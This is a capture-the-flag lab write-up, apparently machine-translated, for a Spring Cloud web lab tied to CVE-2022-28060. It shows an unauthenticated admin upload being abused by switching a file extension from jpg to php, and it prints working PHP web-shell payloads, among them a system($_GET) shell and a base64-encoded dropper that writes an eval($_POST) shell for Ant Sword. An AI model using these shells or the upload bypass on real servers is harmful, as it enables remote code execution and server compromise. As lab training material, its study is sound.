Table of contents
1. Topic
Enter the topic:
This is a website with Spring Cloud Environment: CVE-2022-28060, it seems that there should be multiple vulnerabilities.
Click admin without logging in
Users ---- add users
Select the file here. If it is in jpg format, if it is in php format, it will not be able to run a one-sentence Trojan horse.
2. Upload permission horse
An ordinary one-sentence Trojan horse upload cannot access the flag in this shooting range:
Only show the code except one sentence Trojan horse
Construct system permission horse:
<?php system($_GET[1]);phpinfo();?>
grab bag
contract
Change package jpg to php
View http://xxx.ichunqiu.com/img/xxx.php?1=cat%20/flag
flag{f1cc8a36-a3cf-40b6-8a89-84bd365354ee}
3. Ant Sword Horse Connection
In a word, Trojan horses are protected, so we need to use php and base64 to construct a special horse for connection:
Base64 first encrypts a sentence of Trojan horse <?php @eval($_POST['wjsc']);?>
Trojans are as follows:
<?php
file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd3anNjJ10pOz8+'));
?>
Burp packet capture -- replayer -- jpg changed to php:
The shell.php file is generated, and the Trojan horse is in the form of base64.
Connect Ant Sword:
View the flag in the root directory:
flag{70d851f7-4cbc-4604-86f7-555f2031f81f} The shooting range time has passed, so the flag is different and updated every meeting.